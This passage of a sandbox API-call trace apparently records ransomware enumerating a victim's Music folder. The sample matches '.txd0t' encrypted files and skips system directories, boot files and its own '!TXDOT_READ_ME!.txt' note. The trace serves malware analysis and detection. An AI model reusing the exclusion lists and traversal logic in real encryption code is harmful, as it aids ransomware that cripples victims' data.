lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2570ee90, ftCreationTime.dwHighDateTime=0x1d5e0dd, ftLastAccessTime.dwLowDateTime=0x10ae3e50, ftLastAccessTime.dwHighDateTime=0x1d5ed57, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17272, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ioaNBIFVnbYskp4.wav.txd0t", cAlternateFileName="IOANBI~1.TXD")) returned 1 [0090.214] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2=".") returned 1 [0090.214] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2="..") returned 1 [0090.214] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.214] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.214] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="ioaNBIFVnbYskp4.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t" [0090.214] PathFindExtensionW (pszPath="ioaNBIFVnbYskp4.wav.txd0t") returned=".txd0t" [0090.214] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.214] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c40f90, ftCreationTime.dwHighDateTime=0x1d5e3d2, ftLastAccessTime.dwLowDateTime=0x23cb1ad0, ftLastAccessTime.dwHighDateTime=0x1d5e41f, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4a4c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cAlternateFileName="MO9AZN~1.TXD")) returned 1 [0090.214] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2=".") returned 1 [0090.214] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2="..") returned 1 [0090.215] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.215] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.215] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t" [0090.215] PathFindExtensionW (pszPath="Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned=".txd0t" [0090.215] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.215] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="VdR6kOMbj3V3xP", cAlternateFileName="VDR6KO~1")) returned 1 [0090.215] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2=".") returned 1 [0090.215] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2="..") returned 1 [0090.215] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.215] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.215] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="VdR6kOMbj3V3xP", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system32\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\local\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\boot\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\perflogs\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\programdata\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\drivers\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\wsus\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="crypt_detect") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="cryptolocker") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="ransomware") returned 0x0 [0090.215] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\WINDOWS") returned 0x0 [0090.216] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.216] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files") returned 0x0 [0090.216] GetProcessHeap () returned 0xe30000 [0090.216] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f0) returned 0xecc4e0 [0090.216] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.216] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\*", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*" [0090.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0090.216] StrCmpW (psz1=".", psz2=".") returned 0 [0090.216] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.216] StrCmpW (psz1="..", psz2=".") returned 1 [0090.216] StrCmpW (psz1="..", psz2="..") returned 0 [0090.216] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d123e3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51d123e3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.216] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.216] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.216] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.216] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.216] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt" [0090.216] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.216] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.216] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.217] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.217] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556ab80, ftCreationTime.dwHighDateTime=0x1d5e971, ftLastAccessTime.dwLowDateTime=0x40fcd280, ftLastAccessTime.dwHighDateTime=0x1d5e413, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4854, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="0JKj5_ifBaM.wav.txd0t", cAlternateFileName="0JKJ5_~1.TXD")) returned 1 [0090.217] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2=".") returned 1 [0090.217] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2="..") returned 1 [0090.217] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="0JKj5_ifBaM.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t" [0090.217] PathFindExtensionW (pszPath="0JKj5_ifBaM.wav.txd0t") returned=".txd0t" [0090.217] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.217] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d44f7a0, ftCreationTime.dwHighDateTime=0x1d5e4a9, ftLastAccessTime.dwLowDateTime=0x35d78040, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x51d385b1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1215e, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="3MXWb597R4.mp3.txd0t", cAlternateFileName="3MXWB5~1.TXD")) returned 1 [0090.217] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2=".") returned 1 [0090.217] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2="..") returned 1 [0090.217] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="3MXWb597R4.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t" [0090.217] PathFindExtensionW (pszPath="3MXWb597R4.mp3.txd0t") returned=".txd0t" [0090.217] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.217] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b39650, ftCreationTime.dwHighDateTime=0x1d5ed09, ftLastAccessTime.dwLowDateTime=0x7e8f770, ftLastAccessTime.dwHighDateTime=0x1d5ec98, ftLastWriteTime.dwLowDateTime=0x51d5e873, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16214, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="BhtHzSyEfD5ggEidkz.wav.txd0t", cAlternateFileName="BHTHZS~1.TXD")) returned 1 [0090.217] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2=".") returned 1 [0090.217] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2="..") returned 1 [0090.217] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="BhtHzSyEfD5ggEidkz.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t" [0090.217] PathFindExtensionW (pszPath="BhtHzSyEfD5ggEidkz.wav.txd0t") returned=".txd0t" [0090.217] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.217] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f497d20, ftCreationTime.dwHighDateTime=0x1d5e23f, ftLastAccessTime.dwLowDateTime=0xed9388f0, ftLastAccessTime.dwHighDateTime=0x1d5e214, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15b75, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cAlternateFileName="FJIKXU~1.TXD")) returned 1 [0090.217] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2=".") returned 1 [0090.217] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2="..") returned 1 [0090.217] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t" [0090.217] PathFindExtensionW (pszPath="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned=".txd0t" [0090.217] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.218] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe94b7da0, ftCreationTime.dwHighDateTime=0x1d5e446, ftLastAccessTime.dwLowDateTime=0x1b174e50, ftLastAccessTime.dwHighDateTime=0x1d5e92d, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x625d, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="lwEeZe6NJKctwuGef3c.mp3.txd0t", cAlternateFileName="LWEEZE~1.TXD")) returned 1 [0090.218] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2=".") returned 1 [0090.218] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2="..") returned 1 [0090.218] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="lwEeZe6NJKctwuGef3c.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t" [0090.218] PathFindExtensionW (pszPath="lwEeZe6NJKctwuGef3c.mp3.txd0t") returned=".txd0t" [0090.218] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.218] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05ec6d0, ftCreationTime.dwHighDateTime=0x1d5e424, ftLastAccessTime.dwLowDateTime=0x3cacaa30, ftLastAccessTime.dwHighDateTime=0x1d5eef3, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18443, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="o_54eDamWws3.mp3.txd0t", cAlternateFileName="O_54ED~1.TXD")) returned 1 [0090.218] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", 